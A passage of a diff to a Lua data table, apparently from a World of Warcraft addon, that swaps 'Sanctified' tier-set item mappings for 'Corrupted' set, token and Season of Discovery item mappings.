Handwraps of Dying Light + ["78778"] = { + 78866, -- Gauntlets of the Corrupted Conqueror }, - -- Sanctified Shadowblade Gauntlets - ["51188"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Deep Earth Grips + ["78779"] = { + 78865, -- Gauntlets of the Corrupted Vanquisher }, - -- Sanctified Shadowblade Breastplate - ["51189"] = { - 52025, -- Vanquisher's Mark of Sanctification + -- Spiritwalker's Headpiece + ["78780"] = { + 78870, -- Crown of the Corrupted Protector }, - -- Sanctified Frost Witch's Tunic - ["51190"] = { - 52026, -- Protector's Mark of Sanctification + -- Spiritwalker's Helmet + ["78781"] = { + 78870, -- Crown of the Corrupted Protector }, - -- Sanctified Frost Witch's Handguards - ["51191"] = { - 52026, -- Protector's Mark of Sanctification + -- Necrotic Boneplate Helmet + ["78782"] = { + 78868, -- Crown of the Corrupted Vanquisher }, - -- Sanctified Frost Witch's Headpiece - ["51192"] = { - 52026, -- Protector's Mark of Sanctification + -- Colossal Dragonplate Helmet + ["78783"] = { + 78870, -- Crown of the Corrupted Protector }, - -- Sanctified Frost Witch's Legguards - ["51193"] = { - 52026, -- Protector's Mark of Sanctification + -- Colossal Dragonplate Faceguard + ["78784"] = { + 78870, -- Crown of the Corrupted Protector }, - -- Sanctified Frost Witch's Spaulders - ["51194"] = { - 52026, -- Protector's Mark of Sanctification + -- Deep Earth Helm + ["78785"] = { + 78868, -- Crown of the Corrupted Vanquisher }, - -- Sanctified Frost Witch's Chestguard - ["51195"] = { - 52026, -- Protector's Mark of Sanctification + -- Spiritwalker's Faceguard + ["78786"] = { + 78870, -- Crown of the Corrupted Protector }, - -- Sanctified Frost Witch's Grips - ["51196"] = { - 52026, -- Protector's Mark of Sanctification + -- Headguard of Radiant Glory + ["78787"] = { + 78869, -- Crown of the Corrupted Conqueror }, - -- Sanctified Frost Witch's Faceguard - ["51197"] = { - 52026, -- Protector's Mark of Sanctification + -- Helmet of Radiant Glory + ["78788"] = { + 78869, -- Crown of the Corrupted Conqueror }, - -- Sanctified Frost Witch's War-Kilt - ["51198"] = { - 52026, -- Protector's Mark of Sanctification + -- Deep Earth Headpiece + ["78789"] = { + 78868, -- Crown of the Corrupted Vanquisher }, - -- Sanctified Frost Witch's Shoulderguards - ["51199"] = { - 52026, -- Protector's Mark of Sanctification + -- Faceguard of Radiant Glory + ["78790"] = { + 78869, -- Crown of the Corrupted Conqueror }, - -- Sanctified Frost Witch's Hauberk - ["51200"] = { - 52026, -- Protector's Mark of Sanctification + -- Deep Earth Cover + ["78791"] = { + 78868, -- Crown of the Corrupted Vanquisher }, - -- Sanctified Frost Witch's Gloves - ["51201"] = { - 52026, -- Protector's Mark of Sanctification + -- Necrotic Boneplate Faceguard + ["78792"] = { + 78868, -- Crown of the Corrupted Vanquisher }, - -- Sanctified Frost Witch's Helm - ["51202"] = { - 52026, -- Protector's Mark of Sanctification + -- Wyrmstalker's Headguard + ["78793"] = { + 78870, -- Crown of the Corrupted Protector }, - -- Sanctified Frost Witch's Kilt - ["51203"] = { - 52026, -- Protector's Mark of Sanctification + -- Blackfang Battleweave Helmet + ["78794"] = { + 78868, -- Crown of the Corrupted Vanquisher }, - -- Sanctified Frost Witch's Shoulderpads - ["51204"] = { - 52026, -- Protector's Mark of Sanctification + -- Cowl of Dying Light + ["78795"] = { + 78869, -- Crown of the Corrupted Conqueror }, - -- Sanctified Dark Coven Shoulderpads - ["51205"] = { - 52027, -- Conqueror's Mark of Sanctification + -- Time Lord's Hood + ["78796"] = { + 78868, -- Crown of the Corrupted Vanquisher }, - -- Sanctified Dark Coven Robe - ["51206"] = { - 52027, -- Conqueror's Mark of Sanctification + -- Hood of the Faceless Shroud + ["78797"] = { + 78869, -- Crown of the Corrupted Conqueror }, - -- Sanctified Dark Coven Leggings - ["51207"] = { - 52027, -- Conqueror's Mark of Sanctification + -- Hood of Dying Light + ["78798"] = { + 78869, -- Crown of the Corrupted Conqueror }, - -- Sanctified Dark Coven Hood - ["51208"] = { - 52027, -- Conqueror's Mark of Sanctification + -- Spiritwalker's Legguards + ["78799"] = { + 78873, -- Leggings of the Corrupted Protector }, - -- Sanctified Dark Coven Gloves - ["51209"] = { - 52027, -- Conqueror's Mark of Sanctification + -- Colossal Dragonplate Legguards + ["78800"] = { + 78873, -- Leggings of the Corrupted Protector }, - -- Sanctified Ymirjar Lord's Shoulderplates - ["51210"] = { - 52026, -- Protector's Mark of Sanctification + -- Colossal Dragonplate Legplates + ["78801"] = { + 78873, -- Leggings of the Corrupted Protector }, - -- Sanctified Ymirjar Lord's Legplates - ["51211"] = { - 52026, -- Protector's Mark of Sanctification + -- Necrotic Boneplate Greaves + ["78802"] = { + 78871, -- Leggings of the Corrupted Vanquisher }, - -- Sanctified Ymirjar Lord's Helmet - ["51212"] = { - 52026, -- Protector's Mark of Sanctification + -- Blackfang Battleweave Legguards + ["78803"] = { + 78871, -- Leggings of the Corrupted Vanquisher }, - -- Sanctified Ymirjar Lord's Gauntlets - ["51213"] = { - 52026, -- Protector's Mark of Sanctification + -- Wyrmstalker's Legguards + ["78804"] = { + 78873, -- Leggings of the Corrupted Protector }, - -- Sanctified Ymirjar Lord's Battleplate - ["51214"] = { - 52026, -- Protector's Mark of Sanctification + -- Deep Earth Legwraps + ["78805"] = { + 78871, -- Leggings of the Corrupted Vanquisher }, - -- Sanctified Ymirjar Lord's Pauldrons - ["51215"] = { - 52026, -- Protector's Mark of Sanctification + -- Spiritwalker's Kilt + ["78806"] = { + 78873, -- Leggings of the Corrupted Protector }, - -- Sanctified Ymirjar Lord's Legguards - ["51216"] = { - 52026, -- Protector's Mark of Sanctification + -- Legplates of Radiant Glory + ["78807"] = { + 78872, -- Leggings of the Corrupted Conqueror }, - -- Sanctified Ymirjar Lord's Handguards - ["51217"] = { - 52026, -- Protector's Mark of Sanctification + -- Deep Earth Legguards + ["78808"] = { + 78871, -- Leggings of the Corrupted Vanquisher }, - -- Sanctified Ymirjar Lord's Greathelm - ["51218"] = { - 52026, -- Protector's Mark of Sanctification + -- Deep Earth Leggings + ["78809"] = { + 78871, -- Leggings of the Corrupted Vanquisher }, - -- Sanctified Ymirjar Lord's Breastplate - ["51219"] = { - 52026, -- Protector's Mark of Sanctification + -- Legguards of Radiant Glory + ["78810"] = { + 78872, -- Leggings of the Corrupted Conqueror }, - -- Sanctified Ymirjar Lord's Breastplate - ["51220"] = { - 52029, -- Protector's Mark of Sanctification + -- Necrotic Boneplate Legguards + ["78811"] = { + 78871, -- Leggings of the Corrupted Vanquisher }, - -- Sanctified Ymirjar Lord's Greathelm - ["51221"] = { - 52029, -- Protector's Mark of Sanctification + -- Greaves of Radiant Glory + ["78812"] = { + 78872, -- Leggings of the Corrupted Conqueror }, - -- Sanctified Ymirjar Lord's Handguards - ["51222"] = { - 52029, -- Protector's Mark of Sanctification + -- Spiritwalker's Legwraps + ["78813"] = { + 78873, -- Leggings of the Corrupted Protector }, - -- Sanctified Ymirjar Lord's Legguards - ["51223"] = { - 52029, -- Protector's Mark of Sanctification + -- Legwraps of Dying Light + ["78814"] = { + 78872, -- Leggings of the Corrupted Conqueror }, - -- Sanctified Ymirjar Lord's Pauldrons - ["51224"] = { - 52029, -- Protector's Mark of Sanctification + -- Time Lord's Leggings + ["78815"] = { + 78871, -- Leggings of the Corrupted Vanquisher }, - -- Sanctified Ymirjar Lord's Battleplate - ["51225"] = { - 52029, -- Protector's Mark of Sanctification + -- Leggings of the Faceless Shroud + ["78816"] = { + 78872, -- Leggings of the Corrupted Conqueror }, - -- Sanctified Ymirjar Lord's Gauntlets - ["51226"] = { - 52029, -- Protector's Mark of Sanctification + -- Leggings of Dying Light + ["78817"] = { + 78872, -- Leggings of the Corrupted Conqueror }, - -- Sanctified Ymirjar Lord's Helmet - ["51227"] = { - 52029, -- Protector's Mark of Sanctification + -- Spiritwalker's Hauberk + ["78818"] = { + 78864, -- Chest of the Corrupted Protector }, - -- Sanctified Ymirjar Lord's Legplates - ["51228"] = { - 52029, -- Protector's Mark of Sanctification + -- Spiritwalker's Cuirass + ["78819"] = { + 78864, -- Chest of the Corrupted Protector }, - -- Sanctified Ymirjar Lord's Shoulderplates - ["51229"] = { - 52029, -- Protector's Mark of Sanctification + -- Spiritwalker's Tunic + ["78820"] = { + 78864, -- Chest of the Corrupted Protector + }, + -- Breastplate of Radiant Glory + ["78821"] = { + 78863, -- Chest of the Corrupted Conqueror }, - -- Sanctified Dark Coven Gloves - ["51230"] = { - 52030, -- Conqueror's Mark of Sanctification + -- Battleplate of Radiant Glory + ["78822"] = { + 78863, -- Chest of the Corrupted Conqueror }, - -- Sanctified Dark Coven Hood - ["51231"] = { - 52030, -- Conqueror's Mark of Sanctification + -- Robes of Dying Light + ["78823"] = { + 78863, -- Chest of the Corrupted Conqueror }, - -- Sanctified Dark Coven Leggings - ["51232"] = { - 52030, -- Conqueror's Mark of Sanctification + -- Time Lord's Robes + ["78824"] = { + 78862, -- Chest of the Corrupted Vanquisher }, - -- Sanctified Dark Coven Robe - ["51233"] = { - 52030, -- Conqueror's Mark of Sanctification + -- Robes of the Faceless Shroud + ["78825"] = { + 78863, -- Chest of the Corrupted Conqueror }, - -- Sanctified Dark Coven Shoulderpads - ["51234"] = { - 52030, -- Conqueror's Mark of Sanctification + -- Robes of Dying Light + ["78826"] = { + 78863, -- Chest of the Corrupted Conqueror }, - -- Sanctified Frost Witch's Shoulderpads - ["51235"] = { - 52029, -- Protector's Mark of Sanctification + -- Chestguard of Radiant Glory + ["78827"] = { + 78863, -- Chest of the Corrupted Conqueror }, - -- Sanctified Frost Witch's Kilt - ["51236"] = { - 52029, -- Protector's Mark of Sanctification + -- Spiritwalker's Spaulders + ["78828"] = { + 78876, -- Shoulders of the Corrupted Protector }, - -- Sanctified Frost Witch's Helm - ["51237"] = { - 52029, -- Protector's Mark of Sanctification + -- Colossal Dragonplate Shoulderguards + ["78829"] = { + 78876, -- Shoulders of the Corrupted Protector }, - -- Sanctified Frost Witch's Gloves - ["51238"] = { - 52029, -- Protector's Mark of Sanctification + -- Colossal Dragonplate Pauldrons + ["78830"] = { + 78876, -- Shoulders of the Corrupted Protector }, - -- Sanctified Frost Witch's Hauberk - ["51239"] = { - 52029, -- Protector's Mark of Sanctification + -- Necrotic Boneplate Pauldrons + ["78831"] = { + 78874, -- Shoulders of the Corrupted Vanquisher }, - -- Sanctified Frost Witch's Shoulderguards - ["51240"] = { - 52029, -- Protector's Mark of Sanctification + -- Wyrmstalker's Spaulders + ["78832"] = { + 78876, -- Shoulders of the Corrupted Protector }, - -- Sanctified Frost Witch's War-Kilt - ["51241"] = { - 52029, -- Protector's Mark of Sanctification + -- Blackfang Battleweave Spaulders + ["78833"] = { + 78874, -- Shoulders of the Corrupted Vanquisher }, - -- Sanctified Frost Witch's Faceguard - ["51242"] = { - 52029, -- Protector's Mark of Sanctification + -- Spiritwalker's Mantle + ["78834"] = { + 78876, -- Shoulders of the Corrupted Protector }, - -- Sanctified Frost Witch's Grips - ["51243"] = { - 52029, -- Protector's Mark of Sanctification + -- Deep Earth Mantle + ["78835"] = { + 78874, -- Shoulders of the Corrupted Vanquisher }, - -- Sanctified Frost Witch's Chestguard - ["51244"] = { - 52029, -- Protector's Mark of Sanctification + -- Spiritwalker's Shoulderwraps + ["78836"] = { + 78876, -- Shoulders of the Corrupted Protector }, - -- Sanctified Frost Witch's Spaulders - ["51245"] = { - 52029, -- Protector's Mark of Sanctification + -- Pauldrons of Radiant Glory + ["78837"] = { + 78875, -- Shoulders of the Corrupted Conqueror }, - -- Sanctified Frost Witch's Legguards - ["51246"] = { - 52029, -- Protector's Mark of Sanctification + -- Deep Earth Spaulders + ["78838"] = { + 78874, -- Shoulders of the Corrupted Vanquisher }, - -- Sanctified Frost Witch's Headpiece - ["51247"] = { - 52029, -- Protector's Mark of Sanctification + -- Deep Earth Shoulderwraps + ["78839"] = { + 78874, -- Shoulders of the Corrupted Vanquisher }, - -- Sanctified Frost Witch's Handguards - ["51248"] = { - 52029, -- Protector's Mark of Sanctification + -- Shoulderguards of Radiant Glory + ["78840"] = { + 78875, -- Shoulders of the Corrupted Conqueror }, - -- Sanctified Frost Witch's Tunic - ["51249"] = { - 52029, -- Protector's Mark of Sanctification + -- Mantle of Radiant Glory + ["78841"] = { + 78875, -- Shoulders of the Corrupted Conqueror }, - -- Sanctified Shadowblade Breastplate - ["51250"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- Mantle of Dying Light + ["78842"] = { + 78875, -- Shoulders of the Corrupted Conqueror }, - -- Sanctified Shadowblade Gauntlets - ["51251"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- Time Lord's Mantle + ["78843"] = { + 78874, -- Shoulders of the Corrupted Vanquisher }, - -- Sanctified Shadowblade Helmet - ["51252"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- Mantle of the Faceless Shroud + ["78844"] = { + 78875, -- Shoulders of the Corrupted Conqueror }, - -- Sanctified Shadowblade Legplates - ["51253"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- Mantle of Dying Light + ["78845"] = { + 78875, -- Shoulders of the Corrupted Conqueror }, - -- Sanctified Shadowblade Pauldrons - ["51254"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- Necrotic Boneplate Shoulderguards + ["78846"] = { + 78874, -- Shoulders of the Corrupted Vanquisher }, - -- Sanctified Crimson Acolyte Cowl - ["51255"] = { - 52030, -- Conqueror's Mark of Sanctification + -- Chest of the Corrupted Conqueror + ["78847"] = { + 78726, -- Breastplate of Radiant Glory + 78727, -- Battleplate of Radiant Glory + 78728, -- Robes of Dying Light + 78730, -- Robes of the Faceless Shroud + 78731, -- Robes of Dying Light + 78732, -- Chestguard of Radiant Glory }, - -- Sanctified Crimson Acolyte Handwraps - ["51256"] = { - 52030, -- Conqueror's Mark of Sanctification + -- Chest of the Corrupted Protector + ["78848"] = { + 78657, -- Colossal Dragonplate Battleplate + 78658, -- Colossal Dragonplate Chestguard + 78661, -- Wyrmstalker's Tunic + 78723, -- Spiritwalker's Hauberk + 78724, -- Spiritwalker's Cuirass + 78725, -- Spiritwalker's Tunic }, - -- Sanctified Crimson Acolyte Mantle - ["51257"] = { - 52030, -- Conqueror's Mark of Sanctification + -- Chest of the Corrupted Vanquisher + ["78849"] = { + 78659, -- Necrotic Boneplate Breastplate + 78660, -- Deep Earth Robes + 78662, -- Deep Earth Vestment + 78663, -- Necrotic Boneplate Chestguard + 78664, -- Blackfang Battleweave Tunic + 78665, -- Deep Earth Raiment + 78729, -- Time Lord's Robes }, - -- Sanctified Crimson Acolyte Pants - ["51258"] = { - 52030, -- Conqueror's Mark of Sanctification + -- Crown of the Corrupted Conqueror + ["78850"] = { + 78692, -- Headguard of Radiant Glory + 78693, -- Helmet of Radiant Glory + 78695, -- Faceguard of Radiant Glory + 78700, -- Cowl of Dying Light + 78702, -- Hood of the Faceless Shroud + 78703, -- Hood of Dying Light }, - -- Sanctified Crimson Acolyte Raiments - ["51259"] = { - 52030, -- Conqueror's Mark of Sanctification + -- Crown of the Corrupted Protector + ["78851"] = { + 78685, -- Spiritwalker's Headpiece + 78686, -- Spiritwalker's Helmet + 78688, -- Colossal Dragonplate Helmet + 78689, -- Colossal Dragonplate Faceguard + 78691, -- Spiritwalker's Faceguard + 78698, -- Wyrmstalker's Headguard }, - -- Sanctified Crimson Acolyte Gloves - ["51260"] = { - 52030, -- Conqueror's Mark of Sanctification + -- Crown of the Corrupted Vanquisher + ["78852"] = { + 78687, -- Necrotic Boneplate Helmet + 78690, -- Deep Earth Helm + 78694, -- Deep Earth Headpiece + 78696, -- Deep Earth Cover + 78697, -- Necrotic Boneplate Faceguard + 78699, -- Blackfang Battleweave Helmet + 78701, -- Time Lord's Hood }, - -- Sanctified Crimson Acolyte Hood - ["51261"] = { - 52030, -- Conqueror's Mark of Sanctification + -- Gauntlets of the Corrupted Conqueror + ["78853"] = { + 78673, -- Gloves of Radiant Glory + 78675, -- Gauntlets of Radiant Glory + 78677, -- Handguards of Radiant Glory + 78681, -- Gloves of the Faceless Shroud + 78682, -- Gloves of Dying Light + 78683, -- Handwraps of Dying Light }, - -- Sanctified Crimson Acolyte Leggings - ["51262"] = { - 52030, -- Conqueror's Mark of Sanctification + -- Gauntlets of the Corrupted Protector + ["78854"] = { + 78666, -- Spiritwalker's Gloves + 78667, -- Spiritwalker's Grips + 78668, -- Colossal Dragonplate Gauntlets + 78669, -- Colossal Dragonplate Handguards + 78672, -- Spiritwalker's Handwraps + 78674, -- Wyrmstalker's Gloves }, - -- Sanctified Crimson Acolyte Robe - ["51263"] = { - 52030, -- Conqueror's Mark of Sanctification + -- Gauntlets of the Corrupted Vanquisher + ["78855"] = { + 78670, -- Necrotic Boneplate Gauntlets + 78671, -- Time Lord's Gloves + 78676, -- Deep Earth Gloves + 78678, -- Necrotic Boneplate Handguards + 78679, -- Blackfang Battleweave Gloves + 78680, -- Deep Earth Handwraps + 78684, -- Deep Earth Grips + }, + -- Leggings of the Corrupted Conqueror + ["78856"] = { + 78712, -- Legplates of Radiant Glory + 78715, -- Legguards of Radiant Glory + 78717, -- Greaves of Radiant Glory + 78719, -- Legwraps of Dying Light + 78721, -- Leggings of the Faceless Shroud + 78722, -- Leggings of Dying Light }, - -- Sanctified Crimson Acolyte Shoulderpads - ["51264"] = { - 52030, -- Conqueror's Mark of Sanctification + -- Leggings of the Corrupted Protector + ["78857"] = { + 78704, -- Spiritwalker's Legguards + 78705, -- Colossal Dragonplate Legguards + 78706, -- Colossal Dragonplate Legplates + 78709, -- Wyrmstalker's Legguards + 78711, -- Spiritwalker's Kilt + 78718, -- Spiritwalker's Legwraps }, - -- Sanctified Lightsworn Chestguard - ["51265"] = { - 52030, -- Conqueror's Mark of Sanctification + -- Leggings of the Corrupted Vanquisher + ["78858"] = { + 78707, -- Necrotic Boneplate Greaves + 78708, -- Blackfang Battleweave Legguards + 78710, -- Deep Earth Legwraps + 78713, -- Deep Earth Legguards + 78714, -- Deep Earth Leggings + 78716, -- Necrotic Boneplate Legguards + 78720, -- Time Lord's Leggings }, - -- Sanctified Lightsworn Faceguard - ["51266"] = { - 52030, -- Conqueror's Mark of Sanctification + -- Shoulders of the Corrupted Conqueror + ["78859"] = { + 78742, -- Pauldrons of Radiant Glory + 78745, -- Shoulderguards of Radiant Glory + 78746, -- Mantle of Radiant Glory + 78747, -- Mantle of Dying Light + 78749, -- Mantle of the Faceless Shroud + 78750, -- Mantle of Dying Light }, - -- Sanctified Lightsworn Handguards - ["51267"] = { - 52030, -- Conqueror's Mark of Sanctification + -- Shoulders of the Corrupted Protector + ["78860"] = { + 78733, -- Spiritwalker's Spaulders + 78734, -- Colossal Dragonplate Shoulderguards + 78735, -- Colossal Dragonplate Pauldrons + 78737, -- Wyrmstalker's Spaulders + 78739, -- Spiritwalker's Mantle + 78741, -- Spiritwalker's Shoulderwraps }, - -- Sanctified Lightsworn Legguards - ["51268"] = { - 52030, -- Conqueror's Mark of Sanctification + -- Shoulders of the Corrupted Vanquisher + ["78861"] = { + 78736, -- Necrotic Boneplate Pauldrons + 78738, -- Blackfang Battleweave Spaulders + 78740, -- Deep Earth Mantle + 78743, -- Deep Earth Spaulders + 78744, -- Deep Earth Shoulderwraps + 78748, -- Time Lord's Mantle + 78751, -- Necrotic Boneplate Shoulderguards }, - -- Sanctified Lightsworn Shoulderguards - ["51269"] = { - 52030, -- Conqueror's Mark of Sanctification + -- Chest of the Corrupted Vanquisher + ["78862"] = { + 78754, -- Necrotic Boneplate Breastplate + 78755, -- Deep Earth Robes + 78757, -- Deep Earth Vestment + 78758, -- Necrotic Boneplate Chestguard + 78759, -- Blackfang Battleweave Tunic + 78760, -- Deep Earth Raiment + 78824, -- Time Lord's Robes }, - -- Sanctified Lightsworn Gloves - ["51270"] = { - 52030, -- Conqueror's Mark of Sanctification + -- Chest of the Corrupted Conqueror + ["78863"] = { + 78821, -- Breastplate of Radiant Glory + 78822, -- Battleplate of Radiant Glory + 78823, -- Robes of Dying Light + 78825, -- Robes of the Faceless Shroud + 78826, -- Robes of Dying Light + 78827, -- Chestguard of Radiant Glory }, - -- Sanctified Lightsworn Greaves - ["51271"] = { - 52030, -- Conqueror's Mark of Sanctification + -- Chest of the Corrupted Protector + ["78864"] = { + 78752, -- Colossal Dragonplate Battleplate + 78753, -- Colossal Dragonplate Chestguard + 78756, -- Wyrmstalker's Tunic + 78818, -- Spiritwalker's Hauberk + 78819, -- Spiritwalker's Cuirass + 78820, -- Spiritwalker's Tunic }, - -- Sanctified Lightsworn Headpiece - ["51272"] = { - 52030, -- Conqueror's Mark of Sanctification + -- Gauntlets of the Corrupted Vanquisher + ["78865"] = { + 78765, -- Necrotic Boneplate Gauntlets + 78766, -- Time Lord's Gloves + 78771, -- Deep Earth Gloves + 78773, -- Necrotic Boneplate Handguards + 78774, -- Blackfang Battleweave Gloves + 78775, -- Deep Earth Handwraps + 78779, -- Deep Earth Grips }, - -- Sanctified Lightsworn Spaulders - ["51273"] = { - 52030, -- Conqueror's Mark of Sanctification + -- Gauntlets of the Corrupted Conqueror + ["78866"] = { + 78768, -- Gloves of Radiant Glory + 78770, -- Gauntlets of Radiant Glory + 78772, -- Handguards of Radiant Glory + 78776, -- Gloves of the Faceless Shroud + 78777, -- Gloves of Dying Light + 78778, -- Handwraps of Dying Light }, - -- Sanctified Lightsworn Tunic - ["51274"] = { - 52030, -- Conqueror's Mark of Sanctification + -- Gauntlets of the Corrupted Protector + ["78867"] = { + 78761, -- Spiritwalker's Gloves + 78762, -- Spiritwalker's Grips + 78763, -- Colossal Dragonplate Gauntlets + 78764, -- Colossal Dragonplate Handguards + 78767, -- Spiritwalker's Handwraps + 78769, -- Wyrmstalker's Gloves }, - -- Sanctified Lightsworn Battleplate - ["51275"] = { - 52030, -- Conqueror's Mark of Sanctification + -- Crown of the Corrupted Vanquisher + ["78868"] = { + 78782, -- Necrotic Boneplate Helmet + 78785, -- Deep Earth Helm + 78789, -- Deep Earth Headpiece + 78791, -- Deep Earth Cover + 78792, -- Necrotic Boneplate Faceguard + 78794, -- Blackfang Battleweave Helmet + 78796, -- Time Lord's Hood }, - -- Sanctified Lightsworn Gauntlets - ["51276"] = { - 52030, -- Conqueror's Mark of Sanctification + -- Crown of the Corrupted Conqueror + ["78869"] = { + 78787, -- Headguard of Radiant Glory + 78788, -- Helmet of Radiant Glory + 78790, -- Faceguard of Radiant Glory + 78795, -- Cowl of Dying Light + 78797, -- Hood of the Faceless Shroud + 78798, -- Hood of Dying Light }, - -- Sanctified Lightsworn Helmet - ["51277"] = { - 52030, -- Conqueror's Mark of Sanctification + -- Crown of the Corrupted Protector + ["78870"] = { + 78780, -- Spiritwalker's Headpiece + 78781, -- Spiritwalker's Helmet + 78783, -- Colossal Dragonplate Helmet + 78784, -- Colossal Dragonplate Faceguard + 78786, -- Spiritwalker's Faceguard + 78793, -- Wyrmstalker's Headguard }, - -- Sanctified Lightsworn Legplates - ["51278"] = { - 52030, -- Conqueror's Mark of Sanctification + -- Leggings of the Corrupted Vanquisher + ["78871"] = { + 78802, -- Necrotic Boneplate Greaves + 78803, -- Blackfang Battleweave Legguards + 78805, -- Deep Earth Legwraps + 78808, -- Deep Earth Legguards + 78809, -- Deep Earth Leggings + 78811, -- Necrotic Boneplate Legguards + 78815, -- Time Lord's Leggings }, - -- Sanctified Lightsworn Shoulderplates - ["51279"] = { - 52030, -- Conqueror's Mark of Sanctification + -- Leggings of the Corrupted Conqueror + ["78872"] = { + 78807, -- Legplates of Radiant Glory + 78810, -- Legguards of Radiant Glory + 78812, -- Greaves of Radiant Glory + 78814, -- Legwraps of Dying Light + 78816, -- Leggings of the Faceless Shroud + 78817, -- Leggings of Dying Light }, - -- Sanctified Bloodmage Gloves - ["51280"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- Leggings of the Corrupted Protector + ["78873"] = { + 78799, -- Spiritwalker's Legguards + 78800, -- Colossal Dragonplate Legguards + 78801, -- Colossal Dragonplate Legplates + 78804, -- Wyrmstalker's Legguards + 78806, -- Spiritwalker's Kilt + 78813, -- Spiritwalker's Legwraps }, - -- Sanctified Bloodmage Hood - ["51281"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- Shoulders of the Corrupted Vanquisher + ["78874"] = { + 78831, -- Necrotic Boneplate Pauldrons + 78833, -- Blackfang Battleweave Spaulders + 78835, -- Deep Earth Mantle + 78838, -- Deep Earth Spaulders + 78839, -- Deep Earth Shoulderwraps + 78843, -- Time Lord's Mantle + 78846, -- Necrotic Boneplate Shoulderguards }, - -- Sanctified Bloodmage Leggings - ["51282"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- Shoulders of the Corrupted Conqueror + ["78875"] = { + 78837, -- Pauldrons of Radiant Glory + 78840, -- Shoulderguards of Radiant Glory + 78841, -- Mantle of Radiant Glory + 78842, -- Mantle of Dying Light + 78844, -- Mantle of the Faceless Shroud + 78845, -- Mantle of Dying Light }, - -- Sanctified Bloodmage Robe - ["51283"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- Shoulders of the Corrupted Protector + ["78876"] = { + 78828, -- Spiritwalker's Spaulders + 78829, -- Colossal Dragonplate Shoulderguards + 78830, -- Colossal Dragonplate Pauldrons + 78832, -- Wyrmstalker's Spaulders + 78834, -- Spiritwalker's Mantle + 78836, -- Spiritwalker's Shoulderwraps }, - -- Sanctified Bloodmage Shoulderpads - ["51284"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- Fathom Core + ["204270"] = { + 16762, -- Fathom Core }, - -- Sanctified Ahn'Kahar Blood Hunter's Handguards - ["51285"] = { - 52029, -- Protector's Mark of Sanctification + -- Mortar and Pestle + ["206176"] = { + 15454, -- Mortar and Pestle }, - -- Sanctified Ahn'Kahar Blood Hunter's Headpiece - ["51286"] = { - 52029, -- Protector's Mark of Sanctification + -- Rune of Metamorphosis + ["210980"] = { + 19340, -- Rune of Metamorphosis }, - -- Sanctified Ahn'Kahar Blood Hunter's Legguards - ["51287"] = { - 52029, -- Protector's Mark of Sanctification + -- Avenger's Void Pearl + ["211449"] = { + 211452, -- Perfect Blackfathom Pearl }, - -- Sanctified Ahn'Kahar Blood Hunter's Spaulders - ["51288"] = { - 52029, -- Protector's Mark of Sanctification + -- Invoker's Void Pearl + ["211450"] = { + 211452, -- Perfect Blackfathom Pearl }, - -- Sanctified Ahn'Kahar Blood Hunter's Tunic - ["51289"] = { - 52029, -- Protector's Mark of Sanctification + -- Acolyte's Void Pearl + ["211451"] = { + 211452, -- Perfect Blackfathom Pearl }, - -- Sanctified Lasherweave Cover - ["51290"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- Perfect Blackfathom Pearl + ["211452"] = { + 211449, -- Avenger's Void Pearl + 211450, -- Invoker's Void Pearl + 211451, -- Acolyte's Void Pearl }, - -- Sanctified Lasherweave Gloves - ["51291"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- Strange Water Globe + ["211454"] = { + 16782, -- Strange Water Globe }, - -- Sanctified Lasherweave Mantle - ["51292"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- Mechbuilder's Overalls + ["213298"] = { + 9508, -- Mechbuilder's Overalls }, - -- Sanctified Lasherweave Trousers - ["51293"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- Hyperconductive Shimmershirt + ["213310"] = { + 217008, -- Power Depleted Chest }, - -- Sanctified Lasherweave Vestment - ["51294"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- Hyperconductive Robe + ["213311"] = { + 217008, -- Power Depleted Chest }, - -- Sanctified Lasherweave Handgrips - ["51295"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- Insulated Apron + ["213312"] = { + 217008, -- Power Depleted Chest }, - -- Sanctified Lasherweave Headguard - ["51296"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- Insulated Chestguard + ["213313"] = { + 217008, -- Power Depleted Chest }, - -- Sanctified Lasherweave Legguards - ["51297"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- Electromantic Chainmail + ["213314"] = { + 217008, -- Power Depleted Chest }, - -- Sanctified Lasherweave Raiment - ["51298"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- Electromantic Chainshirt + ["213315"] = { + 217008, -- Power Depleted Chest }, - -- Sanctified Lasherweave Shoulderpads - ["51299"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- H.A.Z.A.R.D. Breastplate + ["213316"] = { + 217008, -- Power Depleted Chest }, - -- Sanctified Lasherweave Robes - ["51300"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- Hyperconductive Pantaloons + ["213328"] = { + 217009, -- Power Depleted Legs }, - -- Sanctified Lasherweave Gauntlets - ["51301"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- Hyperconductive Skirt + ["213329"] = { + 217009, -- Power Depleted Legs }, - -- Sanctified Lasherweave Helmet - ["51302"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- H.A.Z.A.R.D. Legplates + ["213330"] = { + 217009, -- Power Depleted Legs }, - -- Sanctified Lasherweave Legplates - ["51303"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- Insulated Leggings + ["213331"] = { + 217009, -- Power Depleted Legs }, - -- Sanctified Lasherweave Pauldrons - ["51304"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- Insulated Legguards + ["213332"] = { + 217009, -- Power Depleted Legs }, - -- Sanctified Scourgelord Chestguard - ["51305"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- Electromantic Chausses + ["213333"] = { + 217009, -- Power Depleted Legs }, - -- Sanctified Scourgelord Faceguard - ["51306"] = { - 52028, -- Vanquisher's Mark of Sanctification + -- Electromantic Gambeson + ["213334"] = { + 217009, -- Power Depleted Legs }, - 